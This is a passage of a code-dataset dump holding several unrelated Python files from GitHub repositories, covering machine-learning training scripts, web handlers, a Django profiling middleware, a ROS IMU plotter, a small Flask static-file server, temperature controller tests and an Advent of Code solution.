des.insert_one(m)\n","repo_name":"Gyue15/MovieAnalysis","sub_path":"spider/db_util.py","file_name":"db_util.py","file_ext":"py","file_size_in_byte":1666,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"32"} +{"seq_id":"21272921587","text":"import subprocess\nimport pandas as pd\nfrom sklearn.model_selection import train_test_split\nfrom LASExplanation.SHAP import *\nimport os\nfrom sklearn.ensemble import RandomForestClassifier\nfrom sklearn.preprocessing import MinMaxScaler\nimport pkg_resources\n\n\ndef main():\n file = pkg_resources.resource_filename('LASExplanation', 'camel-1.2.csv')\n #file = os.path.join(os.getcwd(), 'camel-1.2.csv')\n df = pd.read_csv(file)\n # demo using a software defect prediction dataset\n for i in range(0, df.shape[0]):\n if df.iloc[i, -1] > 0:\n df.iloc[i, -1] = 1\n else:\n df.iloc[i, -1] = 0\n X=df.iloc[:,:-1]\n y=df.iloc[:,-1]\n X_train, X_test, y_train, y_test = train_test_split(X, y, test_size=0.05)\n sc = MinMaxScaler()\n X_train = pd.DataFrame(sc.fit_transform(X_train), columns=X_train.columns).copy()\n X_test = pd.DataFrame(sc.fit_transform(X_test), columns=X_train.columns).copy()\n clf= 
RandomForestClassifier()\n # print(subprocess.Popen(\"echo pkw\", shell=True, stdout=subprocess.PIPE).stdout.read())\n # ps = subprocess.Popen(\"type lime_fi.txt\", shell=True,stdout=subprocess.PIPE)\n # print('Text copied.')\n # subprocess.Popen(\"sk.py --text 30 --latex True --higher True\", shell=True,stdin=ps.stdout)\n # print('sk.py called')\n clf.fit(X_train,y_train)\n shap = SHAP(clf=clf,X_test=X_test,X_train=X_train)\n # leave sensitive as none if the data has no fairness concerns\n for i in range(len(X_train.columns)):\n print('Index',i,':',X_train.columns[i])\n shap_values = shap.explain()\n shap.summary_plot()\n return True\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"kpeng2019/LAS","sub_path":"LASExplanation/tests/testSHAP.py","file_name":"testSHAP.py","file_ext":"py","file_size_in_byte":1655,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"27010287907","text":"import os\n\nfrom gui import viewmodel\nfrom main import Main\nfrom tkpf import AutoProperty, ViewModel, Bindable\n\n\nclass MainWindow(ViewModel):\n training_set_type = Bindable(AutoProperty('single'))\n available_input_files = Bindable(AutoProperty())\n selected_input_file = Bindable(AutoProperty('Eb_therewill'))\n selected_seed_file = Bindable(AutoProperty())\n available_models = Bindable(AutoProperty())\n selected_model = Bindable(AutoProperty('Feedforward NN'))\n model_order = Bindable(AutoProperty(5))\n epochs = Bindable(AutoProperty(20))\n choruses = Bindable(AutoProperty(3))\n\n def __init__(self):\n super().__init__()\n midis = {os.path.splitext(x)[0] for x in os.listdir('input')}\n changes = {os.path.splitext(x)[0] for x in os.listdir('changes')}\n self.available_input_files = tuple(midis.intersection(changes))\n self.model_naming = {\n 'Markov chain': 'markov',\n 'Feedforward NN': 'neural',\n 'Stateless LSTM': 'lstm_stateless',\n 'Stateful LSTM': 'lstm'\n }\n self.available_models = tuple(self.model_naming.keys())\n self.progressbar_model = viewmodel.KerasProgressbar()\n self.progressbar_model.num_epochs = self.epochs\n\n def observer(val, this):\n if this is self:\n self.progressbar_model.num_epochs = val\n\n type(self).epochs.observers.append(observer)\n\n def run_model_thread_body(self, callback=None):\n keras = None\n model = self.model_naming[self.selected_model]\n try:\n import keras\n if self.training_set_type == 'single':\n Main.single(model, self.selected_input_file, self.choruses, self.model_order, self.epochs, callback)\n elif self.training_set_type == 'weimar':\n Main.weimar(model, self.selected_seed_file, self.choruses, self.model_order, self.epochs, callback)\n except Exception as e:\n if callback:\n callback.error(str(e))\n finally:\n if keras and keras.backend.backend() == 'tensorflow':\n keras.backend.clear_session()\n\n","repo_name":"marczellm/algorimp","sub_path":"gui/viewmodel/MainWindow.py","file_name":"MainWindow.py","file_ext":"py","file_size_in_byte":2155,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"32"} +{"seq_id":"10996664203","text":"# encoding=utf-8\nimport tensorflow as tf\nimport model\nimport data_helper as helper\n\n# model hyperparameters\ntf.flags.DEFINE_float(\"init_learning_rate\", 0.01, \"initial learning rate\")\ntf.flags.DEFINE_float(\"gpu_fraction\", 0.99, \"gpu fraction\")\n# training parameters\ntf.flags.DEFINE_integer(\"batch_size\", 32, \"batch size\")\ntf.flags.DEFINE_integer(\"glove_dim\", 300, \"glove dim size\")\ntf.flags.DEFINE_integer(\"num_epochs\", 200, \"number 
of epochs\")\ntf.flags.DEFINE_integer(\"decay_step\", 10, \"decay step\")\ntf.flags.DEFINE_float(\"decay_rate\", 0.99, \"decay rate\")\ntf.flags.DEFINE_string(\"model\", \"nn\", \"model type\")\nFLAGS = tf.flags.FLAGS\nFLAGS._parse_flags()\n\n\ndef print_param():\n '''\n print the hyperparameters\n :return:\n '''\n print(\"\\nParameters\")\n for attr, value in sorted(FLAGS.__flags.items()):\n print(\"{}={}\".format(attr.upper(), value))\n print(\"\")\n\n\ndef get_placeholder(vocab_size):\n '''\n create the placeholders\n :param story_maxlen:\n :param query_maxlen:\n :return:\n '''\n input_pl = tf.placeholder(tf.float32, shape=[None, FLAGS.glove_dim * 2], name='input_placeholder')\n label_pl = tf.placeholder(tf.int32, shape=[None, vocab_size], name='label_placeholder')\n learning_rate_pl = tf.placeholder(tf.float32)\n return input_pl, label_pl, learning_rate_pl\n\n\ndef train_and_test(challenge):\n '''\n train and evaluate the model\n :return:\n '''\n train, test = helper.extract_file(challenge)\n vocab, word_idx = helper.get_vocab(train, test)\n vocab_size = len(vocab) + 1 # Reserve 0 for masking via pad_sequences\n x, y = helper.vectorize_stories(train, word_idx)\n tx, ty = helper.vectorize_stories(test, word_idx)\n with tf.Graph().as_default() as graph:\n input_pl, label_pl, learning_rate_pl = get_placeholder(vocab_size)\n # choose which model to use\n if FLAGS.model == \"nn\":\n used_model = model.NN\n else:\n used_model = model.LR\n lr = used_model(learning_rate_pl, vocab_size)\n logits = lr.inference(input_pl)\n loss = lr.loss(logits, label_pl)\n train_op = lr.train(loss)\n correct = lr.eval(logits, label_pl)\n init = tf.global_variables_initializer()\n gpu_options = tf.GPUOptions(per_process_gpu_memory_fraction=FLAGS.gpu_fraction)\n with tf.Session(config=tf.ConfigProto(gpu_options=gpu_options), graph=graph) as sess:\n # initialize all variables\n sess.run(init)\n max_test_acc = 0\n step_spam = 0\n current_learning_rate = FLAGS.init_learning_rate\n for i in range(FLAGS.num_epochs):\n batch_id = 1\n if step_spam >= FLAGS.decay_step:\n current_learning_rate = current_learning_rate * FLAGS.decay_rate\n train_gen = helper.generate_data(FLAGS.batch_size, x, y)\n for x_batch, y_batch in train_gen:\n feed_dict = {input_pl: x_batch, label_pl: y_batch, learning_rate_pl: current_learning_rate}\n cost, _ = sess.run([loss, train_op], feed_dict=feed_dict)\n # every fixed number of batches\n # if batch_id % FLAGS.show_every_n_batches == 0:\n # print ('Epoch {:>3} Batch {:>4} train_loss = {:.3f}'.format(i, batch_id, cost))\n batch_id += 1\n # evaluate once after each epoch\n test_gen = helper.generate_data(FLAGS.batch_size, tx, ty)\n total_correct = 0\n total = len(tx)\n for tx_batch, ty_batch in test_gen:\n feed_dict = {input_pl: tx_batch, label_pl: ty_batch, learning_rate_pl: current_learning_rate}\n cor = sess.run(correct, feed_dict=feed_dict)\n total_correct += int(cor)\n acc = total_correct * 1.0 / total\n # keep track of the max test accuracy\n if acc > max_test_acc:\n max_test_acc = acc\n step_spam = 0\n else:\n step_spam += 1\n print (\n 'Epoch{:>3} lr = {:.6f} train_loss = {:.3f} accuracy = {:.3f} max_test_acc = {:.3f}'.format(\n i, current_learning_rate, cost, acc, max_test_acc))\n return max_test_acc\n\n\ndef train_process():\n '''\n training procedure\n :return:\n '''\n print_param()\n prefixs = ['en', 'en-10k']\n tasks = [\n 'qa1_single-supporting-fact', 'qa2_two-supporting-facts', 'qa3_three-supporting-facts',\n 'qa4_two-arg-relations', 'qa5_three-arg-relations', 'qa6_yes-no-questions', 'qa7_counting',\n 'qa8_lists-sets', 'qa9_simple-negation', 'qa10_indefinite-knowledge',\n 'qa11_basic-coreference', 'qa12_conjunction', 
'qa13_compound-coreference',\n 'qa14_time-reasoning', 'qa15_basic-deduction', 'qa16_basic-induction', 'qa17_positional-reasoning',\n 'qa18_size-reasoning', 'qa19_path-finding', 'qa20_agents-motivations'\n ]\n suffix = '_{}.txt'\n with open('result.file', 'w') as result:\n for prefix in prefixs:\n for task in tasks:\n challenge = 'tasks_1-20_v1-2/' + prefix + '/' + task + suffix\n max_test_acc = train_and_test(challenge)\n result.write(prefix + '\\t' + task + '\\t' + str(max_test_acc) + '\\n')\n result.flush()\n result.close\n\n\nif __name__ == \"__main__\":\n train_process()\n","repo_name":"ByzenMa/deepnlp-models","sub_path":"bAbi/n-gram/train_and_test.py","file_name":"train_and_test.py","file_ext":"py","file_size_in_byte":5405,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"32"} +{"seq_id":"16939229368","text":"import webapp2\nimport json\nimport datetime\nfrom model import ModelRange\nLIMIT_ALL = 20000\n\nclass Range(webapp2.RequestHandler):\n def year(self, year):\n if year == 0:\n return datetime.date.today().year\n return year\n\n def prettyprint_years(self, start, stop):\n if stop == 0:\n return '%d-' % (start)\n return '%d-%d' % (start, stop)\n\n def get(self):\n ranges = ModelRange.all().fetch(500)\n # Some trickery to sort the ranges properly\n ranges = sorted(ranges, key=lambda range: -self.year(range.year_end))\n ret = []\n for modelrange in ranges:\n # Skip the generic one\n if modelrange.name != 'Alfa Romeo' and modelrange.name != 'Ukjent':\n ret.append({\n 'key': str(modelrange.key()),\n 'name': modelrange.name,\n 'years': self.prettyprint_years(modelrange.year_start, modelrange.year_end)})\n\n self.response.content_type = 'application/json'\n self.response.write(json.dumps(ret))\n\n\nclass Model(webapp2.RequestHandler):\n def year(self, year):\n if year == 0:\n return datetime.date.today().year\n return year\n\n def prettyprint_years(self, start, stop):\n if stop == 0:\n return '%d-' % (start)\n return '%d-%d' % (start, stop)\n\n def get(self, range_id):\n modelrange = ModelRange.get(range_id)\n ret = []\n if modelrange:\n models = modelrange.models.fetch(500)\n models = sorted(models, key=lambda model: -self.year(model.year_to))\n for model in models:\n ret.append({\n 'key': str(model.key()),\n 'name': model.name,\n 'tipo': model.typeno,\n 'motore': model.engine_code,\n 'years': self.prettyprint_years(model.year_from, model.year_to)\n })\n\n self.response.content_type = 'application/json'\n self.response.write(json.dumps(ret))\n","repo_name":"KlubbAlfaRomeoNorge/members","sub_path":"ajax/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":2060,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"38260575558","text":"import sys\nimport os\nimport re\nfrom collections import defaultdict\n\nimport cProfile\nimport pstats\nimport simplejson\n\nfrom cStringIO import StringIO\n\nfrom django.conf import settings\n\nfrom django.template.loader import get_template\nfrom django.template import Context\nfrom django.http import HttpResponse\n\nwords_re = re.compile( r'\\s+' )\n\ngroup_prefix_re = [\n re.compile( \"^.*/django/[^/]+\" ),\n re.compile( \"^(.*)/[^/]+$\" ), # extract module path\n re.compile( \".*\" ), # catch strange entries\n]\n\nsite_package_re = re.compile(\"^.*/site-packages/(?P[a-zA-Z_]\\w*)?\")\nstdlib_re = re.compile(\"^.*/lib/python.*/(?P[a-zA-Z_]\\w*)?\")\ncore_re = re.compile(\".*(\\{.*\\})\")\n\nclass ProfileMiddleware(object):\n def 
process_view(self, request, callback, callback_args, callback_kwargs):\n if settings.DEBUG and 'prof' in request.GET:\n self.profiler = cProfile.Profile()\n args = (request,) + callback_args\n return self.profiler.runcall(callback, *args, **callback_kwargs)\n\n def get_group(self, file):\n for g in group_prefix_re:\n name = g.findall( file )\n if name:\n return name[0]\n\n def get_summary(self, results_dict, sum):\n lst = [ (item[1], item[0]) for item in results_dict.items() ]\n lst.sort( reverse = True )\n lst = lst[:40]\n\n dct = {}\n for item in lst:\n dct[item[1]] = 100*item[0]/sum if sum else 0\n\n return dct\n\n def summary_for_files(self, stats_str):\n stats_str = stats_str.split(\"\\n\")[5:]\n\n mystats = {}\n mygroups = {}\n mymodules = {}\n myclasses = {\n 'business' : 0,\n 'stdlib' : 0,\n 'cpython' : 0,\n 'django' : 0,\n 'sql' : 0,\n 'diskio' : 0\n }\n\n mybusiness = defaultdict(int)\n mystdlib = defaultdict(int)\n mycpython = defaultdict(int)\n mydjango = defaultdict(int)\n mysql = defaultdict(int)\n mydiskio = defaultdict(int)\n\n sum = 0\n\n for s in stats_str:\n fields = words_re.split(s);\n corecall = core_re.match(s)\n\n # Example:\n # 3 0.004 0.001 0.004 0.001\n # {method # 'execute' of 'psycop g2._psycopg.cursor' objects}\n if corecall:\n callname = corecall.groups(0)[0]\n\n time = float(fields[2])\n mycpython[callname] += time\n\n if \"\"\"of 'file' objects\"\"\" in callname:\n myclasses['diskio'] += time\n mydiskio[callname] += time\n\n # TODO: support for mysql and sqlite\n elif \"\"\"of 'psycopg2._psycopg.cursor'\"\"\" in callname:\n myclasses['sql'] += time\n mysql[callname] += time\n else:\n myclasses['cpython'] += time\n\n # Example:\n # 166 0.001 0.000 0.002 0.000 # /home/.virtualenvs/s/li\n # /python2.7/site-packages/django/utils/functional.py:254(wrapper)\n elif len(fields) == 7:\n\n try:\n time = float(fields[2])\n except:\n # A header line\n continue\n\n sum += time\n\n try:\n filename, lineno = fields[6].split(\":\")\n except ValueError:\n filename = fields[6]\n\n # Files\n if not filename in mystats:\n mystats[filename] = 0\n mystats[filename] += time\n\n\n if 'django' in filename:\n mydjango[filename] += time\n\n # Groups\n group = self.get_group(filename)\n if not group in mygroups:\n mygroups[ group ] = 0\n mygroups[ group ] += time\n\n # Modules\n site_package = site_package_re.match(filename)\n stdlib_package = stdlib_re.match(filename)\n core_call = core_re.match(filename)\n\n # a site-package\n if site_package:\n module = site_package.groupdict().get('module', None)\n\n # Some core Django module\n if module == 'django':\n myclasses['django'] += time\n\n # standard library\n elif stdlib_package:\n module = stdlib_package.groupdict().get('module', None)\n myclasses['stdlib'] += time\n mystdlib[module] += time\n\n # business logic\n else:\n module = filename\n myclasses['business'] += time\n mybusiness[module] += time\n\n\n if not module in mymodules:\n mymodules[ module ] = 0\n\n mymodules[ module ] += time\n\n profiles = {\n 'byfile' : self.get_summary(mystats, sum),\n 'bygroup' : self.get_summary(mygroups, sum),\n 'bypackage' : self.get_summary(mymodules, sum),\n 'byclass' : self.get_summary(myclasses, sum),\n\n 'business' : self.get_summary(mybusiness , sum),\n 'stdlib' : self.get_summary(mystdlib , sum),\n 'cython' : self.get_summary(mycpython, sum),\n 'django' : self.get_summary(mydjango, sum),\n 'sql' : self.get_summary(mysql, sum),\n 'diskio' : self.get_summary(mydiskio, sum),\n }\n\n return profiles\n\n def process_response(self, request, 
response):\n if (settings.DEBUG or request.user.is_superuser) and request.REQUEST.has_key('prof'):\n\n self.profiler.create_stats()\n out = StringIO()\n stats = pstats.Stats(self.profiler, stream=out)\n\n stats.sort_stats('time').print_stats(.2)\n response.content = out.getvalue()\n\n stats_str = out.getvalue()\n\n # The profiler dump\n raw_dump = \"\\n\".join(stats_str.split(\"\\n\")[:40])\n\n # Our profiler dump\n profiles = self.summary_for_files(stats_str)\n\n t = get_template('django_sense/profile.html')\n html = t.render(Context({\n 'raw_dump': raw_dump,\n 'raw_json': simplejson.dumps(profiles, indent=4),\n 'profiles': profiles,\n }))\n return HttpResponse(html)\n else:\n return response\n","repo_name":"MechanisM/django-sense","sub_path":"django_sense/middleware/profiler.py","file_name":"profiler.py","file_ext":"py","file_size_in_byte":6568,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"32"} +{"seq_id":"37762484217","text":"#!/usr/bin/env python\nimport rospy\nimport tf\nfrom tf import *\nimport sys, struct, time,threading\n# Messages\nfrom std_msgs.msg import String\nfrom nav_msgs.msg import Odometry\nfrom geometry_msgs.msg import Point, Quaternion, Vector3\nfrom geometry_msgs.msg import PoseStamped\nfrom geometry_msgs.msg import Twist\nfrom sensor_msgs.msg import Imu\nfrom nav_msgs.msg import Odometry\nimport matplotlib.pyplot as plt\n\n# usage: rosrun kloam imu.py\nsaveFolder = \"/home/binpeng/Documents/KLOAM/imu_test/\"\npubIMU = rospy.Publisher(\"/imuF\", Imu, queue_size = 100)\nxAcc = []\nyAcc = []\nzAcc = []\nxAV = []\nAVbuf = Vector3()\ninitFinish = False\nalpha = 0.1\n\ndef imu_callback(msg):\n\txAcc.append(msg.linear_acceleration.x)\n\tyAcc.append(msg.linear_acceleration.y)\n\tzAcc.append(msg.linear_acceleration.z)\n\txAV.append(msg.angular_velocity.x)\n\ndef imu_filter_callback(msg):\n\tglobal initFinish, AVbuf\n\tif initFinish:\n\t\timuOut = msg\n\t\tAV = Vector3()\n\t\tAV.x = alpha*msg.linear_acceleration.x + (1-alpha)*AVbuf.x\n\t\tAV.y = alpha*msg.linear_acceleration.y + (1-alpha)*AVbuf.y\n\t\tAV.z = alpha*msg.linear_acceleration.z + (1-alpha)*AVbuf.z\n\t\timuOut.linear_acceleration = AV\n\t\t# imuOut.angular_velocity = msg.angular_velocity\n\t\t# imuOut.orientation = msg.orientation\n\t\tpubIMU.publish(imuOut)\n\telse:\n\t\tinitFinish = True\n\tAVbuf = msg.linear_acceleration\n\t\t\n\t\t\n\n\ndef odomListener():\n\trospy.init_node('acc_plot_node', anonymous = True)\n\trospy.loginfo(\"IMU plotting node initialized!\")\n\tsubIMUfilter = rospy.Subscriber(\"/imu\", Imu, imu_filter_callback)\n\tsubIMUplot = rospy.Subscriber(\"/imuF\", Imu, imu_callback)\n\trospy.spin()\ndef plot(folder):\n\trospy.loginfo(\"Start plotting imu\")\n\tplt.title('IMU')\n\tplt.subplot(1,2,1)\n\tplt.plot(xAcc,color='green', label='acc x')\n\tplt.xlabel('Acc x')\n\tplt.subplot(1,2,2)\n\tplt.plot(xAV,color='red', label='angular vel x')\n\tplt.xlabel('Angular velocity x')\n\tplt.legend()\n\t# plt.savefig(folder+\"imu.jpg\")\n\tplt.show()\n\trospy.loginfo(\"Done plotting and saving\")\n# def save(folder):\n# \twith open(folder+\"odomW.txt\",'w') as f1:\n# \t\tfor i in range(len(xWheel)):\n# \t\t\tf1.write(\"%8.3f %8.3f \\n\"%(xWheel[i],yWheel[i]))\n# \twith open(folder+\"odomL.txt\",'w') as f2:\n# \t\tfor i in range(len(xSLAM)):\n# \t\t\tf2.write(\"%8.3f %8.3f \\n\"%(xSLAM[i],ySLAM[i]))\n# \trospy.loginfo(\"Done saving odometry as txts\")\nif __name__ == '__main__':\n\t# try: \n\t# \todomListener()\n\t# except rospy.ROSInterruptException: // this won't catch the \"ctrl+C\"\n\t# 
\tprint(\"wtf\")\n\t# \tplot()\n\todomListener()\n\tif rospy.is_shutdown():\n\t\tplot(saveFolder)\n\t\t# save(saveFolder)\n\n\n\n \n\n","repo_name":"HaisenbergPeng/ROLL","sub_path":"scripts/MISC/imuPlotUnref_TODO.py","file_name":"imuPlotUnref_TODO.py","file_ext":"py","file_size_in_byte":2494,"program_lang":"python","lang":"en","doc_type":"code","stars":150,"dataset":"github-code","pt":"32"} +{"seq_id":"37847829851","text":"from util import *\nfrom d2l import torch as d2l\n\nbatch_size, num_steps = 32, 35\ntrain_iter, vocab = d2l.load_data_time_machine(batch_size, num_steps)\n\nif __name__ == '__main__':\n device = d2l.try_gpu()\n num_hiddens = 256\n num_epochs = 3000\n lr = 0.5\n rnn_layer = nn.RNN(len(vocab), num_hiddens)\n net = RNNModel(rnn_layer, len(vocab))\n net = net.to(device)\n train(net, train_iter, vocab, lr, num_epochs, device)","repo_name":"xiaoqieF/DL-notes","sub_path":"chapter-recurrent-neural-networks/rnn-concise.py","file_name":"rnn-concise.py","file_ext":"py","file_size_in_byte":434,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"35952967045","text":"# Uses python3\n\nclass mpp:\n def maxPairwiseProduct(self, len, arr):\n result = 0\n\n for i in range(0, len):\n for j in range(i + 1, len):\n if arr[i] * arr[j] > result:\n result = arr[i] * arr[j]\n return result\n\n\ndef main():\n n = int(input())\n a = [int(x) for x in input().split()]\n assert (len(a) == n)\n\n print(mpp().maxPairwiseProduct(n, a))\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"seanfeehan/algorithmictoolbox","sub_path":"ass2MaxPairwiseProduct/mpp.py","file_name":"mpp.py","file_ext":"py","file_size_in_byte":460,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"4353816707","text":"#!/usr/bin/python3\n\nimport os\nimport sys\nimport flask\nimport logging\n\nlogging.basicConfig(level=logging.INFO)\n\napp = flask.Flask(__name__)\napp.logger.setLevel(logging.INFO)\n\nlogger = logging.getLogger('application')\nlogger.debug(app.url_map)\nlogger.debug(os.environ)\n\nBASE_DIR = os.path.abspath(os.path.dirname(__file__))\n\ndef configure_server(public_path):\n\t@app.errorhandler(Exception)\n\tdef handle_error(error):\n\t\t# handle server faults (i.e. 
\"non http\" exceptions that get raised.\n\t\tresponse = flask.make_response(\"Sorry, an error occured\", 500)\n\n\t\timport traceback\n\t\ttype_, value_, traceback_ = sys.exc_info()\n\t\ttrace = traceback.format_tb(traceback_)\n\n\t\timport pprint\n\t\tmessage = \"\"\n\t\tmessage += \"*Stack Trace* \\n```%s, %s:\\n%s```\\n\" % (type(error), error.message, \"\".join(trace))\n\n\t\treturn flask.make_response(\"Uh Oh!\", 500)\n\n\t@app.errorhandler(404)\n\tdef default(*args, **kwargs):\n\t\tpage = flask.request.path[1:]\n\n\t\ttry:\n\t\t\tcontents = open(os.path.join(public_path,page)).read()\n\t\texcept IOError as e:\n\t\t\tlogger.info(\"couldn't access %s on the file system, will try index.html instead\", os.path.join(public_path,page))\n\t\t\ttry:\n\t\t\t\tpage = \"index.html\"\n\t\t\t\tcontents = open(os.path.join(public_path,page)).read()\n\t\t\texcept FileNotFoundError as e:\n\t\t\t\tlogger.error(\"couldn't find index.html\")\n\t\t\t\treturn flask.make_response(\"I couldn't find the file you asked for, and couldn't find index.html!\", 404)\n\n\t\timport mimetypes\n\t\tmime, _ = mimetypes.guess_type(page)\n\n\t\tif not mime:\n\t\t\tmime = \"text/html\"\n \n\t\tresponse = flask.make_response(contents, 200)\n\t\tresponse.headers['Content-type'] = mime\n\t\treturn response\n\n\t# log each request -- sadly we do it this way so that we are stil inside the request / response context.... otherwise we can't get the session data :-/\n\taccess_logger = logging.getLogger('access')\n\taccess_logger.setLevel(logging.INFO)\n\t@app.after_request\n\tdef log_request(response):\n\t\taccess_logger.info(\"\\t\".join([flask.request.environ.get('REMOTE_ADDR', \"no_ip\"), flask.session.get('user',{}).get('email', '???'), flask.request.method, flask.request.url, str(response.status_code), str(response.content_length)]))\n\n\t\t# Defeat IE's caching of XMLRPC calls\n\t\tresponse.headers['Cache-Control'] = 'no-cache'\n\t\tresponse.headers['Expires'] = '-1'\n\t\tresponse.headers['Pragma'] = 'no-cache'\n\n\t\treturn response\n\ndef run_server():\n\ttry:\n\t\timport pyqrcode, socket\n\t\t# via https://stackoverflow.com/questions/166506/finding-local-ip-addresses-using-pythons-stdlib\n\t\ts = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)\n\t\tip = \"127.0.0.1\"\n\t\ttry:\n\t\t\t# doesn't even have to be reachable\n\t\t\ts.connect(('10.255.255.255', 1))\n\t\t\tip = s.getsockname()[0]\n\t\tfinally:\n\t\t\ts.close()\n\n\t\turl = 'http://'+ip+\":5000\"\n\t\tqr = pyqrcode.create(url)\n\t\tprint(qr.terminal(quiet_zone=1))\n\t\tlogger.info(\"external address: \"+ url)\n\texcept Exception as e:\n\t\tlogger.info(\"qrcode not installed, not showing QR\", e)\n\n\tapp.run(host=app.config.get('LISTEN_HOST', '0.0.0.0'), threaded=True)\n\nif __name__ == '__main__':\n\tpath = './'\n\tif len(sys.argv) > 1:\n\t\tpath = sys.argv[1]\n\tconfigure_server(path)\n\trun_server()\n","repo_name":"ihle/misc","sub_path":"serve-react.py","file_name":"serve-react.py","file_ext":"py","file_size_in_byte":3136,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"32"} +{"seq_id":"7493627837","text":"from .mock_sensor import MockSensor\nfrom app.temperature_controller.heaters import MockHeater\nfrom .mock_cooler import MockCooler\nfrom app.temperature_controller.temperature_controller import TemperatureController, ControllerMode, TemperatureState, ControllerState\n\n\ndef test_temperature_controller():\n\n sensor = MockSensor([60.0, 60.0, 60.0])\n mock_heater = MockHeater()\n\n temp_controller = 
TemperatureController(\n sensor, mode=ControllerMode.HEATER, heater=mock_heater)\n\n\n\ndef test_compare_temperature():\n sensor = MockSensor([50.0, 59.1, 60.1, 61.0])\n mock_heater = MockHeater()\n\n temp_controller = TemperatureController(\n sensor, mode=ControllerMode.HEATER, heater=mock_heater)\n\n temp_controller.update_set_temp(60)\n\n temp_state = temp_controller.compare_temperature()\n assert temp_state == TemperatureState.UNDER_TEMP\n\n temp_state = temp_controller.compare_temperature()\n assert temp_state == TemperatureState.IN_RANGE_UNDER\n\n temp_state = temp_controller.compare_temperature()\n assert temp_state == TemperatureState.IN_RANGE_OVER\n\n temp_state = temp_controller.compare_temperature()\n assert temp_state == TemperatureState.OVER_TEMP\n\n\ndef test_tick():\n heater_sensor = MockSensor([50.0, 59.9, 60.0, 60.1])\n mock_heater = MockHeater()\n\n heater_temp_controller = TemperatureController(\n heater_sensor, mode=ControllerMode.HEATER, heater=mock_heater)\n\n heater_temp_controller.update_set_temp(60.0)\n\n heater_cases = [\n {\"current_temperature\": 50.0, \"mode\": ControllerMode.HEATER,\n \"set_temperature\": 60.0, \"state\": ControllerState.HEATER_ON},\n {\"current_temperature\": 59.9, \"mode\": ControllerMode.HEATER,\n \"set_temperature\": 60.0, \"state\": ControllerState.HEATER_ON},\n {\"current_temperature\": 60.0, \"mode\": ControllerMode.HEATER,\n \"set_temperature\": 60.0, \"state\": ControllerState.ALL_OFF},\n {\"current_temperature\": 60.1, \"mode\": ControllerMode.HEATER,\n \"set_temperature\": 60.0, \"state\": ControllerState.ALL_OFF}\n ]\n\n for case in heater_cases:\n current_state = heater_temp_controller.tick()\n assert_cases(case, current_state)\n\n cooler_sensor = MockSensor([70.0, 60.1, 59.9, 59.0])\n mock_cooler = MockCooler()\n cooler_temp_controller = TemperatureController(\n cooler_sensor, mode=ControllerMode.COOLER, cooler=mock_cooler)\n\n cooler_temp_controller.update_set_temp(60.0)\n\n cooler_cases = [\n {\"current_temperature\": 70.0, \"mode\": ControllerMode.COOLER,\n \"set_temperature\": 60.0, \"state\": ControllerState.COOLER_ON},\n {\"current_temperature\": 60.1, \"mode\": ControllerMode.COOLER,\n \"set_temperature\": 60.0, \"state\": ControllerState.COOLER_ON},\n {\"current_temperature\": 59.9, \"mode\": ControllerMode.COOLER,\n \"set_temperature\": 60.0, \"state\": ControllerState.ALL_OFF},\n {\"current_temperature\": 59.0, \"mode\": ControllerMode.COOLER,\n \"set_temperature\": 60.0, \"state\": ControllerState.ALL_OFF}\n ]\n\n for case in cooler_cases:\n current_state = cooler_temp_controller.tick()\n assert_cases(case, current_state)\n\n\ndef assert_cases(case, current_state):\n assert current_state is not None\n assert current_state.get(\"current_temperature\") is not None\n assert case.get(\"current_temperature\") == current_state.get(\n \"current_temperature\")\n assert case.get(\"mode\") == current_state.get(\"mode\")\n assert case.get(\"set_temperature\") == current_state.get(\"set_temperature\")\n assert case.get(\"state\") == current_state.get(\"state\")\n","repo_name":"fellbythecoop/home-brewery","sub_path":"brewhouse-manager/tests/temperature_controller/test_temperature_controller.py","file_name":"test_temperature_controller.py","file_ext":"py","file_size_in_byte":3617,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"12924320980","text":"import helpers as h\nimport re\n\ninput = h.readdaylines(22, 2022)\nboard = [line.ljust(150, ' ') for line in 
input[0:-2]]\ntboard = [list(row) for row in zip(*board)]\npath = input[-1]\n\nsteps = [e if e.isalpha() else int(e) for e in re.findall(r'(\\d+|\\D)', path)]\n\ndef r(dir):\n return (-dir[1], dir[0])\ndef l(dir):\n return (dir[1], -dir[0])\n\ndef walk(path):\n pos = nextlineindex(board, (0, 0), 1)\n print(pos)\n dir = (1, 0)\n for c in path:\n if isinstance(c, int):\n for _ in range(c):\n pos = next(pos, dir)\n print(dir, pos)\n else:\n if c == 'R':\n dir = r(dir)\n else:\n dir = l(dir)\n return score(pos, dir)\n\ndef next(pos: (int, int), dir: (int, int)):\n \"\"\"\n Returns the next position given the current position and direction\n \"\"\"\n # branch on direction\n if dir == (1, 0) or dir == (-1, 0): # horizontal\n return nextlineindex(board, pos, dir[0])\n elif dir == (0, 1) or dir == (0, -1): # vertical\n (x, y) = nextlineindex(tboard, (pos[1], pos[0]), dir[1])\n return (y, x)\n\n\ndef nextlineindex(board, pos: (int, int), dir: -1 | 1):\n line = board[pos[1]]\n curx = pos[0]\n mod = len(line)\n # search for next '.' reset when '#' is found\n while True: \n i = (curx + dir) % mod\n next = line[i]\n if (next == '.'):\n curx = i\n break\n elif (next == '#'):\n curx = pos[0]\n break\n elif (next == ' '):\n curx = i \n \n\n return (curx, pos[1])\n\ndef score(pos, dir):\n return 4 * (pos[0] + 1) + 1000 * (pos[1] + 1) + facingscore(dir)\n\ndef facingscore(dir):\n if dir == (1, 0):\n return 0\n elif dir == (0, 1):\n return 1\n elif dir == (-1, 0):\n return 2\n elif dir == (0, -1):\n return 